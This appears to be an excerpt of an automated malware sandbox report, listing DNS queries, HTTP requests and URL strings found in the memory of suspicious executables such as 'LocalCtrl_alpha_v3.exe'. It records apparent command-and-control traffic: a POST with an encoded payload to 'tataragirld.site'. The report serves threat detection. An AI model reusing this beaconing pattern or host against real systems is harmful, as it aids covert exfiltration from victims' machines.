Source: global trafficHTTP traffic detected: GET /c.gif?rnd=1736252351083&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=cd8507b94268428491b16cc06b6a4f34&activityId=cd8507b94268428491b16cc06b6a4f34&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=50B43BAE0D944675912718075641D4BF&MUID=040C031DFB13691C1F601670FA61685C HTTP/1.1Host: c.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=040C031DFB13691C1F601670FA61685C; _EDGE_S=F=1&SID=1621632D55D36AC30139764054C26B23; _EDGE_V=1; SM=T
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.1980841681.0000000002E92000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2034574518.0000000002E92000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: .@5xZ3G5DxduMdjwaP7T9kCajCVFWz7KtIxqiDLKu18Q=' 'self' 'report-sample' assets.msn.cn assets2.msn.cn assets.msn.com assets2.msn.com www.msn.com www.msn.cn c.s-microsoft.com/mscc/ geolocation.onetrust.com/cookieconsentpub/v1/geo/location https://www.clarity.ms platform.bing.com/geo/AutoSuggest/v1 www.bing.com/as/ www.bing.com/s/as/ www.youtube.com js.monitor.azure.com business.bing.com/msb/ equals www.youtube.com (Youtube)
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.1980841681.0000000002E92000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2034574518.0000000002E92000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: .@5xZ3G5DxduMdjwaP7T9kCajCVFWz7KtIxqiDLKu18Q=' 'self' 'report-sample' assets.msn.cn assets2.msn.cn assets.msn.com assets2.msn.com www.msn.com www.msn.cn c.s-microsoft.com/mscc/ geolocation.onetrust.com/cookieconsentpub/v1/geo/location https://www.clarity.ms platform.bing.com/geo/AutoSuggest/v1 www.bing.com/as/ www.bing.com/s/as/ www.youtube.com js.monitor.azure.com business.bing.com/msb/g.com/msb/;worker-src * blob:X8 equals www.youtube.com (Youtube)
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.1980841681.0000000002E92000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2034574518.0000000002E92000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: @5xZ3G5DxduMdjwaP7T9kCajCVFWz7KtIxqiDLKu18Q=' 'self' 'report-sample' assets.msn.cn assets2.msn.cn assets.msn.com assets2.msn.com www.msn.com www.msn.cn c.s-microsoft.com/mscc/ geolocation.onetrust.com/cookieconsentpub/v1/geo/location https://www.clarity.ms platform.bing.com/geo/AutoSuggest/v1 www.bing.com/as/ www.bing.com/s/as/ www.youtube.com js.monitor.azure.com business.bing.com/msb/ equals www.youtube.com (Youtube)
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.1980841681.0000000002E92000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2034574518.0000000002E92000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: rc 'nonce-R5xZ3G5DxduMdjwaP7T9kCajCVFWz7KtIxqiDLKu18Q=' 'self' 'report-sample' assets.msn.cn assets2.msn.cn assets.msn.com assets2.msn.com www.msn.com www.msn.cn c.s-microsoft.com/mscc/ geolocation.onetrust.com/cookieconsentpub/v1/geo/location https://www.clarity.ms platform.bing.com/geo/AutoSuggest/v1 www.bing.com/as/ www.bing.com/s/as/ www.youtube.com js.monitor.azure.com business.bing.com/msb/;worker-src * blob: equals www.youtube.com (Youtube)
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.1980841681.0000000002E92000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2034574518.0000000002E92000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: rc 'nonce-R5xZ3G5DxduMdjwaP7T9kCajCVFWz7KtIxqiDLKu18Q=' 'self' 'report-sample' assets.msn.cn assets2.msn.cn assets.msn.com assets2.msn.com www.msn.com www.msn.cn c.s-microsoft.com/mscc/ geolocation.onetrust.com/cookieconsentpub/v1/geo/location https://www.clarity.ms platform.bing.com/geo/AutoSuggest/v1 www.bing.com/as/ www.bing.com/s/as/ www.youtube.com js.monitor.azure.com business.bing.com/msb/;worker-src * blob:X8 equals www.youtube.com (Youtube)
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2047550996.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: www.facebook.com equals www.facebook.com (Facebook)
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2047550996.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: www.facebook.comr08X equals www.facebook.com (Facebook)
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2047550996.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: www.youtube.com equals www.youtube.com (Youtube)
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2047550996.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: www.youtube.com`r08X equals www.youtube.com (Youtube)
Source: global trafficDNS traffic detected: DNS query: time.windows.com
Source: global trafficDNS traffic detected: DNS query: tataragirld.site
Source: global trafficDNS traffic detected: DNS query: ntp.msn.com
Source: global trafficDNS traffic detected: DNS query: bzib.nelreports.net
Source: global trafficDNS traffic detected: DNS query: sb.scorecardresearch.com
Source: global trafficDNS traffic detected: DNS query: assets.msn.com
Source: global trafficDNS traffic detected: DNS query: c.msn.com
Source: global trafficDNS traffic detected: DNS query: api.msn.com
Source: global trafficDNS traffic detected: DNS query: chrome.cloudflare-dns.com
Source: global trafficDNS traffic detected: DNS query: clients2.googleusercontent.com
Source: unknownHTTP traffic detected: POST /2009_New_England_Patriots_season?omlxpbik85mer=%2BBA7Gis1n3XVmJgLCG%2BgLgGVQ1E79NkVzyEnWTmwcxfStdd4il28zJlLoAzjvUO%2BK%2B3IAZfOMRKWTcb%2Fuzy%2FRA%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0Content-Length: 147Host: tataragirld.site
Source: LVkAi4PBv6.exeString found in binary or memory: http://appsyndication.org/2006/appsyn
Source: LVkAi4PBv6.exe, 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp, LVkAi4PBv6.exe, 00000000.00000000.1353994334.00000000008AB000.00000002.00000001.01000000.00000003.sdmp, LVkAi4PBv6.exe, 00000002.00000002.1364930208.000000000060B000.00000002.00000001.01000000.00000005.sdmp, LVkAi4PBv6.exe, 00000002.00000000.1358153893.000000000060B000.00000002.00000001.01000000.00000005.sdmpString found in binary or memory: http://appsyndication.org/2006/appsynapplicationapuputil.cppupgradeexclusivetrueenclosuredigestalgor
Source: AdobeSync.exe, 00000003.00000002.1393381948.0000000008473000.00000004.00000020.00020000.00000000.sdmp, AdobeSync.exe, 00000004.00000002.1457961617.0000000008072000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1685366173.00000000049CD000.00000004.00000800.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000002.2207694719.00000000026AC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCA-1.crt0
Source: AdobeSync.exe, 00000003.00000002.1393381948.0000000008473000.00000004.00000020.00020000.00000000.sdmp, AdobeSync.exe, 00000004.00000002.1457961617.0000000008072000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1685366173.00000000049CD000.00000004.00000800.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000002.2207694719.00000000026AC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCodeSigningCA-1.crt0
Source: AdobeSync.exe, 00000003.00000002.1393381948.0000000008473000.00000004.00000020.00020000.00000000.sdmp, AdobeSync.exe, 00000004.00000002.1457961617.0000000008072000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1685366173.00000000049CD000.00000004.00000800.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000002.2207694719.00000000026AC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2073226207.0000000007F57000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2096732268.0000000007F57000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2047012487.0000000002E92000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1978883225.0000000002E92000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2034065698.0000000002E92000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2073866489.0000000007F57000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0B
Source: AdobeSync.exe, 00000003.00000002.1393381948.0000000008473000.00000004.00000020.00020000.00000000.sdmp, AdobeSync.exe, 00000004.00000002.1457961617.0000000008072000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1685366173.00000000049CD000.00000004.00000800.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000002.2207694719.00000000026AC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: AdobeSync.exe, 00000003.00000002.1393381948.0000000008473000.00000004.00000020.00020000.00000000.sdmp, AdobeSync.exe, 00000004.00000002.1457961617.0000000008072000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1685366173.00000000049CD000.00000004.00000800.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000002.2207694719.00000000026AC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDCA-1.crl08
Source: AdobeSync.exe, 00000003.00000002.1393381948.0000000008473000.00000004.00000020.00020000.00000000.sdmp, AdobeSync.exe, 00000004.00000002.1457961617.0000000008072000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1685366173.00000000049CD000.00000004.00000800.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000002.2207694719.00000000026AC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: AdobeSync.exe, 00000003.00000002.1393381948.0000000008473000.00000004.00000020.00020000.00000000.sdmp, AdobeSync.exe, 00000004.00000002.1457961617.0000000008072000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1685366173.00000000049CD000.00000004.00000800.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000002.2207694719.00000000026AC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2073226207.0000000007F57000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2096732268.0000000007F57000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2047012487.0000000002E92000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1978883225.0000000002E92000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2034065698.0000000002E92000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2073866489.0000000007F57000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl0
Source: AdobeSync.exe, 00000003.00000002.1393381948.0000000008473000.00000004.00000020.00020000.00000000.sdmp, AdobeSync.exe, 00000004.00000002.1457961617.0000000008072000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1685366173.00000000049CD000.00000004.00000800.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000002.2207694719.00000000026AC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/assured-cs-g1.crl00
Source: AdobeSync.exe, 00000003.00000002.1393381948.0000000008473000.00000004.00000020.00020000.00000000.sdmp, AdobeSync.exe, 00000004.00000002.1457961617.0000000008072000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1685366173.00000000049CD000.00000004.00000800.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000002.2207694719.00000000026AC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: AdobeSync.exe, 00000003.00000002.1393381948.0000000008473000.00000004.00000020.00020000.00000000.sdmp, AdobeSync.exe, 00000004.00000002.1457961617.0000000008072000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1685366173.00000000049CD000.00000004.00000800.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000002.2207694719.00000000026AC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDCA-1.crl0w
Source: AdobeSync.exe, 00000003.00000002.1393381948.0000000008473000.00000004.00000020.00020000.00000000.sdmp, AdobeSync.exe, 00000004.00000002.1457961617.0000000008072000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1685366173.00000000049CD000.00000004.00000800.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000002.2207694719.00000000026AC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: AdobeSync.exe, 00000003.00000002.1393381948.0000000008473000.00000004.00000020.00020000.00000000.sdmp, AdobeSync.exe, 00000004.00000002.1457961617.0000000008072000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1685366173.00000000049CD000.00000004.00000800.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000002.2207694719.00000000026AC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: AdobeSync.exe, 00000003.00000002.1393381948.0000000008473000.00000004.00000020.00020000.00000000.sdmp, AdobeSync.exe, 00000004.00000002.1457961617.0000000008072000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1685366173.00000000049CD000.00000004.00000800.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000002.2207694719.00000000026AC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/assured-cs-g1.crl0L
Source: AdobeSync.exe, 00000003.00000002.1393381948.0000000008473000.00000004.00000020.00020000.00000000.sdmp, AdobeSync.exe, 00000004.00000002.1457961617.0000000008072000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1685366173.00000000049CD000.00000004.00000800.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000002.2207694719.00000000026AC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.1977443665.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2032970902.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://e5.i.lencr.org/0A
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.1977443665.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2032970902.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://e5.o.lencr.org0
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.1977982579.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://msn.com
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2073226207.0000000007F57000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2096732268.0000000007F57000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2047012487.0000000002E92000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1978883225.0000000002E92000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2034065698.0000000002E92000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2073866489.0000000007F57000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
Source: AdobeSync.exe, 00000003.00000002.1393381948.0000000008473000.00000004.00000020.00020000.00000000.sdmp, AdobeSync.exe, 00000004.00000002.1457961617.0000000008072000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1685366173.00000000049CD000.00000004.00000800.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000002.2207694719.00000000026AC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
Source: AdobeSync.exe, 00000003.00000002.1393381948.0000000008473000.00000004.00000020.00020000.00000000.sdmp, AdobeSync.exe, 00000004.00000002.1457961617.0000000008072000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1685366173.00000000049CD000.00000004.00000800.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000002.2207694719.00000000026AC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
Source: AdobeSync.exe, 00000003.00000002.1393381948.0000000008473000.00000004.00000020.00020000.00000000.sdmp, AdobeSync.exe, 00000004.00000002.1457961617.0000000008072000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1685366173.00000000049CD000.00000004.00000800.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000002.2207694719.00000000026AC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0L
Source: AdobeSync.exe, 00000003.00000002.1393381948.0000000008473000.00000004.00000020.00020000.00000000.sdmp, AdobeSync.exe, 00000004.00000002.1457961617.0000000008072000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1685366173.00000000049CD000.00000004.00000800.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000002.2207694719.00000000026AC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0O
Source: AdobeSync.exe, 00000003.00000002.1393381948.0000000008473000.00000004.00000020.00020000.00000000.sdmp, AdobeSync.exe, 00000004.00000002.1457961617.0000000008072000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1685366173.00000000049CD000.00000004.00000800.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000002.2207694719.00000000026AC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
Source: AdobeSync.exe, 00000003.00000002.1393381948.0000000008473000.00000004.00000020.00020000.00000000.sdmp, AdobeSync.exe, 00000004.00000002.1457961617.0000000008072000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1685366173.00000000049CD000.00000004.00000800.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000002.2207694719.00000000026AC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://s2.symcb.com0
Source: AdobeSync.exe, 00000003.00000002.1393381948.0000000008473000.00000004.00000020.00020000.00000000.sdmp, AdobeSync.exe, 00000004.00000002.1457961617.0000000008072000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1685366173.00000000049CD000.00000004.00000800.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000002.2207694719.00000000026AC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://sv.symcb.com/sv.crl0a
Source: AdobeSync.exe, 00000003.00000002.1393381948.0000000008473000.00000004.00000020.00020000.00000000.sdmp, AdobeSync.exe, 00000004.00000002.1457961617.0000000008072000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1685366173.00000000049CD000.00000004.00000800.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000002.2207694719.00000000026AC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://sv.symcb.com/sv.crt0
Source: AdobeSync.exe, 00000003.00000002.1393381948.0000000008473000.00000004.00000020.00020000.00000000.sdmp, AdobeSync.exe, 00000004.00000002.1457961617.0000000008072000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1685366173.00000000049CD000.00000004.00000800.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000002.2207694719.00000000026AC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://sv.symcd.com0&
Source: AdobeSync.exe, 00000003.00000002.1393381948.0000000008473000.00000004.00000020.00020000.00000000.sdmp, AdobeSync.exe, 00000004.00000002.1457961617.0000000008072000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1685366173.00000000049CD000.00000004.00000800.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000002.2207694719.00000000026AC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000000.1641532314.00000001401E0000.00000002.00000001.01000000.00000015.sdmpString found in binary or memory: http://www.???.xx/?search=%s
Source: AdobeSync.exe, 00000003.00000002.1393381948.0000000008473000.00000004.00000020.00020000.00000000.sdmp, AdobeSync.exe, 00000004.00000002.1457961617.0000000008072000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1685366173.00000000049CD000.00000004.00000800.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000002.2207694719.00000000026AC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: AdobeSync.exe, 00000003.00000002.1393381948.000000000841D000.00000004.00000020.00020000.00000000.sdmp, AdobeSync.exe, 00000004.00000002.1457961617.000000000801C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1685366173.0000000004984000.00000004.00000800.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000002.2207694719.0000000002663000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.info-zip.org/
Source: AdobeSync.exe, 00000003.00000002.1393381948.0000000008473000.00000004.00000020.00020000.00000000.sdmp, AdobeSync.exe, 00000004.00000002.1457961617.0000000008072000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1685366173.00000000049CD000.00000004.00000800.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000002.2207694719.00000000026AC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000000.1641532314.00000001401E0000.00000002.00000001.01000000.00000015.sdmpString found in binary or memory: http://www.softwareok.com
Source: LocalCtrl_alpha_v3.exe, 00000009.00000000.1641532314.00000001401F4000.00000002.00000001.01000000.00000015.sdmpString found in binary or memory: http://www.softwareok.com/?Download=Find.Same.Images.OK
Source: LocalCtrl_alpha_v3.exe, 00000009.00000000.1641532314.00000001401F4000.00000002.00000001.01000000.00000015.sdmpString found in binary or memory: http://www.softwareok.com/?Freeware/Find.Same.Images.OK
Source: LocalCtrl_alpha_v3.exe, 00000009.00000000.1641532314.00000001401F4000.00000002.00000001.01000000.00000015.sdmpString found in binary or memory: http://www.softwareok.com/?Freeware/Find.Same.Images.OK/History
Source: LocalCtrl_alpha_v3.exe, 00000009.00000000.1641532314.00000001401F4000.00000002.00000001.01000000.00000015.sdmpString found in binary or memory: http://www.softwareok.com/?seite=faq-Find.Same.Images.OK&faq=0
Source: AdobeSync.exe, 00000003.00000002.1393381948.0000000008473000.00000004.00000020.00020000.00000000.sdmp, AdobeSync.exe, 00000004.00000002.1457961617.0000000008072000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1685366173.00000000049CD000.00000004.00000800.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000002.2207694719.00000000026AC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000000.1641532314.00000001401E0000.00000002.00000001.01000000.00000015.sdmpString found in binary or memory: http://www.softwareok.de
Source: LocalCtrl_alpha_v3.exe, 00000009.00000000.1641532314.00000001401F4000.00000002.00000001.01000000.00000015.sdmpString found in binary or memory: http://www.softwareok.de/?Download=Find.Same.Images.OK
Source: LocalCtrl_alpha_v3.exe, 00000009.00000000.1641532314.00000001401F4000.00000002.00000001.01000000.00000015.sdmpString found in binary or memory: http://www.softwareok.de/?Freeware/Find.Same.Images.OK
Source: LocalCtrl_alpha_v3.exe, 00000009.00000000.1641532314.00000001401F4000.00000002.00000001.01000000.00000015.sdmpString found in binary or memory: http://www.softwareok.de/?Freeware/Find.Same.Images.OK/History
Source: LocalCtrl_alpha_v3.exe, 00000009.00000000.1641532314.00000001401F4000.00000002.00000001.01000000.00000015.sdmpString found in binary or memory: http://www.softwareok.de/?seite=faq-Find.Same.Images.OK&faq=0
Source: LocalCtrl_alpha_v3.exe, 00000009.00000000.1641437637.0000000140156000.00000002.00000001.01000000.00000015.sdmpString found in binary or memory: http://www.surfok.de/
Source: AdobeSync.exe, 00000003.00000002.1393381948.0000000008473000.00000004.00000020.00020000.00000000.sdmp, AdobeSync.exe, 00000004.00000002.1457961617.0000000008072000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1685366173.00000000049CD000.00000004.00000800.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000002.2207694719.00000000026AC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.symauth.com/cps0(
Source: AdobeSync.exe, 00000003.00000002.1393381948.0000000008473000.00000004.00000020.00020000.00000000.sdmp, AdobeSync.exe, 00000004.00000002.1457961617.0000000008072000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1685366173.00000000049CD000.00000004.00000800.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000002.2207694719.00000000026AC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.symauth.com/rpa00
Source: AdobeSync.exe, 00000003.00000002.1393381948.0000000008473000.00000004.00000020.00020000.00000000.sdmp, AdobeSync.exe, 00000004.00000002.1457961617.0000000008072000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1685366173.00000000049CD000.00000004.00000800.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000002.2207694719.00000000026AC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.vmware.com/0
Source: AdobeSync.exe, 00000003.00000002.1393381948.0000000008473000.00000004.00000020.00020000.00000000.sdmp, AdobeSync.exe, 00000004.00000002.1457961617.0000000008072000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1685366173.00000000049CD000.00000004.00000800.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000002.2207694719.00000000026AC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.vmware.com/0/
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.1843774604.0000000007EF8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2019584697.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1992114443.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2096732268.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://alekberg.net/privacy
